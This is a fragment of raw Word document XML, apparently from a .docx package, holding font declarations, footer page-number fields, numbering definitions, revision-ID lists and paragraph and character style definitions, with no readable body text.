    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:altName w:val="Roboto"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="DejaVu Sans">
    <w:altName w:val="Verdana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C10E5C" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="00A1278D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr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</w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>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30C90" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="00A1278D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr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</w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:lang w:bidi="he-IL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33B179" w14:textId="77777777" w:rsidR="00CD3107" w:rsidRDefault="00CD3107">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4570889F" w14:textId="77777777" w:rsidR="00CD3107" w:rsidRDefault="00CD31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0A3F3" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="0083611B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-I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8FD3E" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="0083611B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-I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150B8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3D4C8B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4B217C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60AC245C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="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0"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1EE56807"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="654805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542454E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25B292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64179"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F37A1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5452312">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1768883662">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="801967480">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1842576409">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1008600142">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="605695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11B"/>
    <w:rsid w:val="00002691"/>
    <w:rsid w:val="00010FD5"/>
    <w:rsid w:val="00012175"/>
    <w:rsid w:val="00016757"/>
    <w:rsid w:val="000254D0"/>
    <w:rsid w:val="00026527"/>
    <w:rsid w:val="00026BE5"/>
    <w:rsid w:val="000438ED"/>
    <w:rsid w:val="0005672F"/>
    <w:rsid w:val="00062F38"/>
    <w:rsid w:val="0006492D"/>
    <w:rsid w:val="000708C2"/>
    <w:rsid w:val="00071516"/>
    <w:rsid w:val="00085C56"/>
    <w:rsid w:val="00086EB9"/>
    <w:rsid w:val="000916BD"/>
    <w:rsid w:val="000A50CE"/>
    <w:rsid w:val="000A6BEB"/>
    <w:rsid w:val="000B0E24"/>
    <w:rsid w:val="000B1091"/>
    <w:rsid w:val="000B152C"/>
    <w:rsid w:val="000D4925"/>
    <w:rsid w:val="000F0A52"/>
    <w:rsid w:val="001000C6"/>
    <w:rsid w:val="0010120E"/>
    <w:rsid w:val="00102385"/>
    <w:rsid w:val="0010366D"/>
    <w:rsid w:val="00105276"/>
    <w:rsid w:val="00105D0F"/>
    <w:rsid w:val="001068AE"/>
    <w:rsid w:val="001136F7"/>
    <w:rsid w:val="00116ED5"/>
    <w:rsid w:val="00117BDB"/>
    <w:rsid w:val="00126769"/>
    <w:rsid w:val="00136898"/>
    <w:rsid w:val="00136FDF"/>
    <w:rsid w:val="00144625"/>
    <w:rsid w:val="00152F88"/>
    <w:rsid w:val="0017020E"/>
    <w:rsid w:val="00170AAF"/>
    <w:rsid w:val="00173DD6"/>
    <w:rsid w:val="00181386"/>
    <w:rsid w:val="00182AD1"/>
    <w:rsid w:val="001846F9"/>
    <w:rsid w:val="00187BE2"/>
    <w:rsid w:val="001A049F"/>
    <w:rsid w:val="001B0C53"/>
    <w:rsid w:val="001B6872"/>
    <w:rsid w:val="001B7187"/>
    <w:rsid w:val="001B7CA4"/>
    <w:rsid w:val="001C04B8"/>
    <w:rsid w:val="001C11A9"/>
    <w:rsid w:val="001C1577"/>
    <w:rsid w:val="001F2014"/>
    <w:rsid w:val="001F2A6F"/>
    <w:rsid w:val="001F48D3"/>
    <w:rsid w:val="001F791B"/>
    <w:rsid w:val="00217810"/>
    <w:rsid w:val="00226555"/>
    <w:rsid w:val="00240E51"/>
    <w:rsid w:val="00246ADF"/>
    <w:rsid w:val="00254132"/>
    <w:rsid w:val="00254BC3"/>
    <w:rsid w:val="0026524E"/>
    <w:rsid w:val="00267200"/>
    <w:rsid w:val="00271257"/>
    <w:rsid w:val="00272F95"/>
    <w:rsid w:val="00285A8A"/>
    <w:rsid w:val="0028695A"/>
    <w:rsid w:val="00287CCB"/>
    <w:rsid w:val="002A0BC4"/>
    <w:rsid w:val="002A5939"/>
    <w:rsid w:val="002B42D6"/>
    <w:rsid w:val="002C3D56"/>
    <w:rsid w:val="002C57C3"/>
    <w:rsid w:val="002E52F9"/>
    <w:rsid w:val="002F1C93"/>
    <w:rsid w:val="002F2B03"/>
    <w:rsid w:val="002F71A9"/>
    <w:rsid w:val="00304FAF"/>
    <w:rsid w:val="00321276"/>
    <w:rsid w:val="00325016"/>
    <w:rsid w:val="00325AD5"/>
    <w:rsid w:val="00330592"/>
    <w:rsid w:val="003319C3"/>
    <w:rsid w:val="00332E1A"/>
    <w:rsid w:val="003405BD"/>
    <w:rsid w:val="00362A36"/>
    <w:rsid w:val="003641BE"/>
    <w:rsid w:val="003653E0"/>
    <w:rsid w:val="00371B31"/>
    <w:rsid w:val="00375C32"/>
    <w:rsid w:val="00377B25"/>
    <w:rsid w:val="0038163F"/>
    <w:rsid w:val="0039071C"/>
    <w:rsid w:val="003A3FC3"/>
    <w:rsid w:val="003B1C92"/>
    <w:rsid w:val="003B31C8"/>
    <w:rsid w:val="003B7C3A"/>
    <w:rsid w:val="003C47D1"/>
    <w:rsid w:val="003F02CC"/>
    <w:rsid w:val="003F24F7"/>
    <w:rsid w:val="00406478"/>
    <w:rsid w:val="004103DA"/>
    <w:rsid w:val="00416B76"/>
    <w:rsid w:val="004216F6"/>
    <w:rsid w:val="00434500"/>
    <w:rsid w:val="00436CF1"/>
    <w:rsid w:val="00447B33"/>
    <w:rsid w:val="00451917"/>
    <w:rsid w:val="004553B0"/>
    <w:rsid w:val="00457654"/>
    <w:rsid w:val="004774E6"/>
    <w:rsid w:val="00487F9B"/>
    <w:rsid w:val="00490B95"/>
    <w:rsid w:val="004A2F73"/>
    <w:rsid w:val="004A6656"/>
    <w:rsid w:val="004C744F"/>
    <w:rsid w:val="004D6C08"/>
    <w:rsid w:val="004E634F"/>
    <w:rsid w:val="00501199"/>
    <w:rsid w:val="00501524"/>
    <w:rsid w:val="0050217F"/>
    <w:rsid w:val="005564A4"/>
    <w:rsid w:val="00560B39"/>
    <w:rsid w:val="00572953"/>
    <w:rsid w:val="005734A9"/>
    <w:rsid w:val="005775D5"/>
    <w:rsid w:val="00581063"/>
    <w:rsid w:val="00583E36"/>
    <w:rsid w:val="005A5C3B"/>
    <w:rsid w:val="005A5D66"/>
    <w:rsid w:val="005A6DB6"/>
    <w:rsid w:val="005B3582"/>
    <w:rsid w:val="005B3D44"/>
    <w:rsid w:val="005C0951"/>
    <w:rsid w:val="005C6D41"/>
    <w:rsid w:val="005D2180"/>
    <w:rsid w:val="005D5E3B"/>
    <w:rsid w:val="005D6A98"/>
    <w:rsid w:val="005E22F6"/>
    <w:rsid w:val="005E7D6B"/>
    <w:rsid w:val="005F117A"/>
    <w:rsid w:val="005F1F7E"/>
    <w:rsid w:val="005F5453"/>
    <w:rsid w:val="005F6605"/>
    <w:rsid w:val="00602D9B"/>
    <w:rsid w:val="00605777"/>
    <w:rsid w:val="00606274"/>
    <w:rsid w:val="00606BA3"/>
    <w:rsid w:val="00607DD2"/>
    <w:rsid w:val="006169E1"/>
    <w:rsid w:val="00620723"/>
    <w:rsid w:val="00622A71"/>
    <w:rsid w:val="00626DF8"/>
    <w:rsid w:val="00635F52"/>
    <w:rsid w:val="00636AB2"/>
    <w:rsid w:val="006379CD"/>
    <w:rsid w:val="0064478C"/>
    <w:rsid w:val="00655436"/>
    <w:rsid w:val="006619AB"/>
    <w:rsid w:val="006619B2"/>
    <w:rsid w:val="00664F76"/>
    <w:rsid w:val="00671AEE"/>
    <w:rsid w:val="006746C7"/>
    <w:rsid w:val="00680723"/>
    <w:rsid w:val="00692977"/>
    <w:rsid w:val="006934CF"/>
    <w:rsid w:val="006948EB"/>
    <w:rsid w:val="006A3151"/>
    <w:rsid w:val="006B4BC8"/>
    <w:rsid w:val="006C08A7"/>
    <w:rsid w:val="006C2FBA"/>
    <w:rsid w:val="006D1F75"/>
    <w:rsid w:val="006D339B"/>
    <w:rsid w:val="006D3E77"/>
    <w:rsid w:val="006D5F6B"/>
    <w:rsid w:val="006D6597"/>
    <w:rsid w:val="006E4AE4"/>
    <w:rsid w:val="006F2E6E"/>
    <w:rsid w:val="006F5DB1"/>
    <w:rsid w:val="00703307"/>
    <w:rsid w:val="007103C2"/>
    <w:rsid w:val="0071223B"/>
    <w:rsid w:val="00715168"/>
    <w:rsid w:val="00724092"/>
    <w:rsid w:val="007310DC"/>
    <w:rsid w:val="00733F22"/>
    <w:rsid w:val="00734DA3"/>
    <w:rsid w:val="00735C78"/>
    <w:rsid w:val="007378D1"/>
    <w:rsid w:val="00737B7F"/>
    <w:rsid w:val="007403B3"/>
    <w:rsid w:val="00744A56"/>
    <w:rsid w:val="007460C3"/>
    <w:rsid w:val="00760A1A"/>
    <w:rsid w:val="0076206E"/>
    <w:rsid w:val="00764B7E"/>
    <w:rsid w:val="00770CB3"/>
    <w:rsid w:val="00772A08"/>
    <w:rsid w:val="00774A1A"/>
    <w:rsid w:val="00784B61"/>
    <w:rsid w:val="00794503"/>
    <w:rsid w:val="007A2663"/>
    <w:rsid w:val="007A27D3"/>
    <w:rsid w:val="007A6863"/>
    <w:rsid w:val="007C0A5B"/>
    <w:rsid w:val="007C6B38"/>
    <w:rsid w:val="007D1D90"/>
    <w:rsid w:val="007D3B33"/>
    <w:rsid w:val="007D4F05"/>
    <w:rsid w:val="007D643D"/>
    <w:rsid w:val="007D769E"/>
    <w:rsid w:val="007D77C3"/>
    <w:rsid w:val="007F6305"/>
    <w:rsid w:val="007F6937"/>
    <w:rsid w:val="007F6E43"/>
    <w:rsid w:val="008002B7"/>
    <w:rsid w:val="00803E2F"/>
    <w:rsid w:val="00820D47"/>
    <w:rsid w:val="0082142A"/>
    <w:rsid w:val="00827667"/>
    <w:rsid w:val="0083336C"/>
    <w:rsid w:val="0083611B"/>
    <w:rsid w:val="00844A2A"/>
    <w:rsid w:val="00850564"/>
    <w:rsid w:val="008575A3"/>
    <w:rsid w:val="0085768E"/>
    <w:rsid w:val="00864277"/>
    <w:rsid w:val="00865EA9"/>
    <w:rsid w:val="0087745C"/>
    <w:rsid w:val="00883649"/>
    <w:rsid w:val="00890BA6"/>
    <w:rsid w:val="008913BC"/>
    <w:rsid w:val="008A54A4"/>
    <w:rsid w:val="008A6EF0"/>
    <w:rsid w:val="008A7A20"/>
    <w:rsid w:val="008B7028"/>
    <w:rsid w:val="008C04F7"/>
    <w:rsid w:val="008C0592"/>
    <w:rsid w:val="008C2185"/>
    <w:rsid w:val="008C30C5"/>
    <w:rsid w:val="008C5CFA"/>
    <w:rsid w:val="008C72FD"/>
    <w:rsid w:val="008D081B"/>
    <w:rsid w:val="008D273C"/>
    <w:rsid w:val="008D6A1D"/>
    <w:rsid w:val="008E0BA8"/>
    <w:rsid w:val="008E1300"/>
    <w:rsid w:val="008E299B"/>
    <w:rsid w:val="008E51A7"/>
    <w:rsid w:val="008E5B6C"/>
    <w:rsid w:val="008F40A0"/>
    <w:rsid w:val="00901654"/>
    <w:rsid w:val="009058DF"/>
    <w:rsid w:val="00906D0E"/>
    <w:rsid w:val="009070CC"/>
    <w:rsid w:val="00916D2F"/>
    <w:rsid w:val="00926BD0"/>
    <w:rsid w:val="00943795"/>
    <w:rsid w:val="009444B8"/>
    <w:rsid w:val="00945853"/>
    <w:rsid w:val="0097287F"/>
    <w:rsid w:val="009728DD"/>
    <w:rsid w:val="00973B66"/>
    <w:rsid w:val="00975AFE"/>
    <w:rsid w:val="00981779"/>
    <w:rsid w:val="00993D41"/>
    <w:rsid w:val="00997473"/>
    <w:rsid w:val="009A0693"/>
    <w:rsid w:val="009A74AE"/>
    <w:rsid w:val="009B0A1F"/>
    <w:rsid w:val="009B1A8B"/>
    <w:rsid w:val="009B231A"/>
    <w:rsid w:val="009B7328"/>
    <w:rsid w:val="009C624A"/>
    <w:rsid w:val="009C6273"/>
    <w:rsid w:val="009E790E"/>
    <w:rsid w:val="00A02CD8"/>
    <w:rsid w:val="00A038D5"/>
    <w:rsid w:val="00A05090"/>
    <w:rsid w:val="00A1278D"/>
    <w:rsid w:val="00A22222"/>
    <w:rsid w:val="00A23379"/>
    <w:rsid w:val="00A3145D"/>
    <w:rsid w:val="00A34F9F"/>
    <w:rsid w:val="00A3637B"/>
    <w:rsid w:val="00A402EA"/>
    <w:rsid w:val="00A40F47"/>
    <w:rsid w:val="00A41F94"/>
    <w:rsid w:val="00A44BF8"/>
    <w:rsid w:val="00A46762"/>
    <w:rsid w:val="00A51B55"/>
    <w:rsid w:val="00A60268"/>
    <w:rsid w:val="00A66E1C"/>
    <w:rsid w:val="00A701FB"/>
    <w:rsid w:val="00A91453"/>
    <w:rsid w:val="00A95171"/>
    <w:rsid w:val="00AA30EA"/>
    <w:rsid w:val="00AA500B"/>
    <w:rsid w:val="00AA6E2B"/>
    <w:rsid w:val="00AA71E2"/>
    <w:rsid w:val="00AA7DB0"/>
    <w:rsid w:val="00AB0776"/>
    <w:rsid w:val="00AB16FD"/>
    <w:rsid w:val="00AB4E8F"/>
    <w:rsid w:val="00AB5325"/>
    <w:rsid w:val="00AB6767"/>
    <w:rsid w:val="00AC2359"/>
    <w:rsid w:val="00AC46FD"/>
    <w:rsid w:val="00AC6BB2"/>
    <w:rsid w:val="00AC74AA"/>
    <w:rsid w:val="00AE299E"/>
    <w:rsid w:val="00AE726A"/>
    <w:rsid w:val="00AE73CA"/>
    <w:rsid w:val="00AF26E5"/>
    <w:rsid w:val="00B06D6F"/>
    <w:rsid w:val="00B339FE"/>
    <w:rsid w:val="00B339FF"/>
    <w:rsid w:val="00B33AAE"/>
    <w:rsid w:val="00B40015"/>
    <w:rsid w:val="00B45225"/>
    <w:rsid w:val="00B4766A"/>
    <w:rsid w:val="00B644B9"/>
    <w:rsid w:val="00B72989"/>
    <w:rsid w:val="00B81E98"/>
    <w:rsid w:val="00B82776"/>
    <w:rsid w:val="00B86D0E"/>
    <w:rsid w:val="00B9105E"/>
    <w:rsid w:val="00BA620B"/>
    <w:rsid w:val="00BA7369"/>
    <w:rsid w:val="00BB3F5F"/>
    <w:rsid w:val="00BB7EC2"/>
    <w:rsid w:val="00BD3572"/>
    <w:rsid w:val="00BD4674"/>
    <w:rsid w:val="00BF71EA"/>
    <w:rsid w:val="00C038F0"/>
    <w:rsid w:val="00C05A3B"/>
    <w:rsid w:val="00C16176"/>
    <w:rsid w:val="00C3114D"/>
    <w:rsid w:val="00C34487"/>
    <w:rsid w:val="00C42531"/>
    <w:rsid w:val="00C42C75"/>
    <w:rsid w:val="00C46107"/>
    <w:rsid w:val="00C5732E"/>
    <w:rsid w:val="00C67635"/>
    <w:rsid w:val="00C8065A"/>
    <w:rsid w:val="00C806EA"/>
    <w:rsid w:val="00C9035C"/>
    <w:rsid w:val="00C90C14"/>
    <w:rsid w:val="00CA0AE5"/>
    <w:rsid w:val="00CA1A5D"/>
    <w:rsid w:val="00CA3FA6"/>
    <w:rsid w:val="00CB4FE3"/>
    <w:rsid w:val="00CC1BDB"/>
    <w:rsid w:val="00CC60A4"/>
    <w:rsid w:val="00CD3107"/>
    <w:rsid w:val="00CD5A76"/>
    <w:rsid w:val="00CD6592"/>
    <w:rsid w:val="00CE0D5A"/>
    <w:rsid w:val="00CE1BA7"/>
    <w:rsid w:val="00CE26B4"/>
    <w:rsid w:val="00CE4738"/>
    <w:rsid w:val="00CE4D4E"/>
    <w:rsid w:val="00CE59CC"/>
    <w:rsid w:val="00CF1CAC"/>
    <w:rsid w:val="00CF28FB"/>
    <w:rsid w:val="00CF3BDB"/>
    <w:rsid w:val="00D018B0"/>
    <w:rsid w:val="00D0242A"/>
    <w:rsid w:val="00D032C5"/>
    <w:rsid w:val="00D11277"/>
    <w:rsid w:val="00D130CF"/>
    <w:rsid w:val="00D262E6"/>
    <w:rsid w:val="00D60020"/>
    <w:rsid w:val="00D615F4"/>
    <w:rsid w:val="00D648D1"/>
    <w:rsid w:val="00D706EB"/>
    <w:rsid w:val="00D719A4"/>
    <w:rsid w:val="00D738F0"/>
    <w:rsid w:val="00D73AED"/>
    <w:rsid w:val="00D762C9"/>
    <w:rsid w:val="00D77691"/>
    <w:rsid w:val="00D81387"/>
    <w:rsid w:val="00D82B6B"/>
    <w:rsid w:val="00D97049"/>
    <w:rsid w:val="00DA03BB"/>
    <w:rsid w:val="00DA4207"/>
    <w:rsid w:val="00DA6233"/>
    <w:rsid w:val="00DC7ECD"/>
    <w:rsid w:val="00DD6D07"/>
    <w:rsid w:val="00DF44C5"/>
    <w:rsid w:val="00DF4E4B"/>
    <w:rsid w:val="00DF5C9C"/>
    <w:rsid w:val="00DF78DD"/>
    <w:rsid w:val="00E0069D"/>
    <w:rsid w:val="00E108D4"/>
    <w:rsid w:val="00E13A63"/>
    <w:rsid w:val="00E215AD"/>
    <w:rsid w:val="00E30A34"/>
    <w:rsid w:val="00E35BEE"/>
    <w:rsid w:val="00E377BC"/>
    <w:rsid w:val="00E42076"/>
    <w:rsid w:val="00E424DB"/>
    <w:rsid w:val="00E44C9B"/>
    <w:rsid w:val="00E51B23"/>
    <w:rsid w:val="00E52947"/>
    <w:rsid w:val="00E54F59"/>
    <w:rsid w:val="00E64ED1"/>
    <w:rsid w:val="00E66DE1"/>
    <w:rsid w:val="00E672F4"/>
    <w:rsid w:val="00E77338"/>
    <w:rsid w:val="00E8428B"/>
    <w:rsid w:val="00E857F0"/>
    <w:rsid w:val="00EA202F"/>
    <w:rsid w:val="00EA6524"/>
    <w:rsid w:val="00EB006B"/>
    <w:rsid w:val="00EB1755"/>
    <w:rsid w:val="00EB7960"/>
    <w:rsid w:val="00EC08E2"/>
    <w:rsid w:val="00EC127A"/>
    <w:rsid w:val="00EC1EA9"/>
    <w:rsid w:val="00EC52A3"/>
    <w:rsid w:val="00EE087C"/>
    <w:rsid w:val="00EF04B6"/>
    <w:rsid w:val="00EF7A42"/>
    <w:rsid w:val="00F01D74"/>
    <w:rsid w:val="00F04722"/>
    <w:rsid w:val="00F068FA"/>
    <w:rsid w:val="00F1324A"/>
    <w:rsid w:val="00F137E2"/>
    <w:rsid w:val="00F27397"/>
    <w:rsid w:val="00F3310B"/>
    <w:rsid w:val="00F36416"/>
    <w:rsid w:val="00F44FF5"/>
    <w:rsid w:val="00F548E7"/>
    <w:rsid w:val="00F640D4"/>
    <w:rsid w:val="00F656B2"/>
    <w:rsid w:val="00F714F6"/>
    <w:rsid w:val="00F73581"/>
    <w:rsid w:val="00F7760A"/>
    <w:rsid w:val="00F84C80"/>
    <w:rsid w:val="00FC0BF1"/>
    <w:rsid w:val="00FC3422"/>
    <w:rsid w:val="00FF5452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A99C"/>
  <w15:docId w15:val="{E264C72B-0124-4791-92C1-A827D5D64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lang w:val="en-ZA" w:eastAsia="en-ZA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 w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="he-IL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113" w:after="57"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="113" w:after="57"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000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113" w:after="57"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria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="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria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character" w:customStyle="1" w:styleId="NoneA">
    <w:name w:val="None A"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="None">
    <w:name w:val="None"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="None"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single" w:color="0000FF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Cambria" w:hAnsi="Calibri" w:cs="Cambria"/>
      <w:b/>
      <w:color w:val="000000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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="IndexLink">
    <w:name w:val="Index Link"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="0563C1"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO4LVL1">
    <w:name w:val="WW_CharLFO4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2">
    <w:name w:val="WW_CharLFO4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3">
    <w:name w:val="WW_CharLFO4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4">
    <w:name w:val="WW_CharLFO4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5">
    <w:name w:val="WW_CharLFO4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6">
    <w:name w:val="WW_CharLFO4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7">
    <w:name w:val="WW_CharLFO4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8">
    <w:name w:val="WW_CharLFO4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4LVL9">
    <w:name w:val="WW_CharLFO4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1">
    <w:name w:val="WW_CharLFO5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2">
    <w:name w:val="WW_CharLFO5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3">
    <w:name w:val="WW_CharLFO5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4">
    <w:name w:val="WW_CharLFO5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5">
    <w:name w:val="WW_CharLFO5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6">
    <w:name w:val="WW_CharLFO5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7">
    <w:name w:val="WW_CharLFO5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8">
    <w:name w:val="WW_CharLFO5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5LVL9">
    <w:name w:val="WW_CharLFO5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1">
    <w:name w:val="WW_CharLFO6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2">
    <w:name w:val="WW_CharLFO6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3">
    <w:name w:val="WW_CharLFO6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4">
    <w:name w:val="WW_CharLFO6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5">
    <w:name w:val="WW_CharLFO6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6">
    <w:name w:val="WW_CharLFO6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7">
    <w:name w:val="WW_CharLFO6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8">
    <w:name w:val="WW_CharLFO6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6LVL9">
    <w:name w:val="WW_CharLFO6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1">
    <w:name w:val="WW_CharLFO7LVL1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2">
    <w:name w:val="WW_CharLFO7LVL2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3">
